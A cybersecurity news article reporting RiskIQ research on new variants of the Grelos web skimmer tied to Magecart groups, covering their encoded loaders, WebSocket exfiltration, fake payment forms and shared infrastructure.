Just as seasonal online shopping kicks into high gear, new variants of the point-of-sale Grelos skimmer malware have been identified. Variants are targeting the payment-card data of online retail shoppers on dozens of compromised websites, researchers warn.
The Grelos skimmer malware has been around since 2015, and its original version is associated with what are called Groups 1 and 2 under the prolific Magecart umbrella of loosely organized cybercriminals. However, over time new actors began to co-opt the Grelos skimmer and reuse some of the original domains used to host the malware. This has accumulated into what researchers say is a unique overlap in infrastructure for the most recent variants of the skimmer between Grelos and Magecart.
In a new analysis, researchers said that a cookie found on a compromised website led to the discovery of Grelos – and they were then able to find links between new variants because they had matching infrastructure and identical records on the WHOIS query and response protocol (widely used for querying databases).
“Recently, a unique cookie allowed RiskIQ researchers to connect a recent variant of this skimmer to an even newer version that uses a fake payment form to steal payment data from victims,” said researchers with RiskIQ in an analysis this week. “Domains related to this cookie have compromised dozens of sites so far.”
The Skimmer Variant
The new variants of the skimmer first appeared when researcher Affable Kraut documented it via Twitter in July 2020. This version of the skimmer features a loader stage and a skimmer stage, both of which are base64 encoded five times over, said researchers.
The Grelos variant discovered by Kraut also used WebSockets for skimming. The WebSocket API is a technology making it possible to open a two-way interactive communication session between a web browser and a server. The use of the WebSocket connection to exfiltrate sensitive data is not new and was first observed in connection with a Magecart Group 9 skimmer in December 2019.
Then in a separate incident, researchers investigated the threat group Full(z) House’s recent compromise of Boom!Mobile in October. During their investigation, researchers noticed a unique cookie, which was connected to three additional skimming domains and several victim domains.
These skimming domains, which included facebookapimanager[.]com and googleapimanager[.]com, contained a more recent variant of the Grelos variant. Researchers said the connection between the cookie and the skimmer domains piqued their interest because skimmer domains sharing an identical cookie is not common.
“These four domains have been hosted on several different IPs, but most often they used infrastructure belonging to ASN 45102 – Hangzhou Alibaba Advertising Co.,Ltd., a hosting provider that is currently popular with several different Magecart actors,” said researchers.
This skimmer has a similar base64 encoded loader stage to one documented by Kraut, except this loader stage is only under one layer of encoding, with a duplicate of the encoded script tag below it (without encoding), said researchers.
The skimmer code included a “translate” function with various phrases used by the fake HTML payment form that it creates after it compromises a website. These phrases include “Pay with credit or debit card;” “Check the cardholder first name;” “We can not process your payment,” and other phrases.
When a shopper visits a compromised website, they are presented with the fake payment form containing these phrases. When they upload their payment card information, that data is exfiltrated by the skimmer via a function that stringifies the stolen data, along with the site_id, sid, and ip (this function also features an interesting grammatical mistake, researchers noted, using the word “sended” rather than “sent”).
Researchers recently reported that they have seen an uptick in the number of e-commerce sites that are being attacked by Magecart and related groups, dovetailing with new tactics. Typically Magecart compromise websites with web skimmers – either via a vulnerability in the websites’ e-commerce platform, gaining access to the victim’s network via phishing or other means, or other tactics (it’s unclear what tactics the threat actors are using for compromising websites with the Grelos skimmer).
In October, one of the largest known Magecart campaigns to date took place, with nearly 2,000 e-commerce sites hacked in an automated campaign that may be linked to a zero-day exploit. Earlier in September, Magecart was seen using the secure messaging service Telegram as a data-exfiltration mechanism.
Researchers with RiskIQ for their part, said they expect overlaps in infrastructure used to host various skimmers; as well as the reuse of skimmer code, to increase in the future.
“This complex overlap illustrates the increasingly muddy waters for researchers tracking Magecart,” they warned.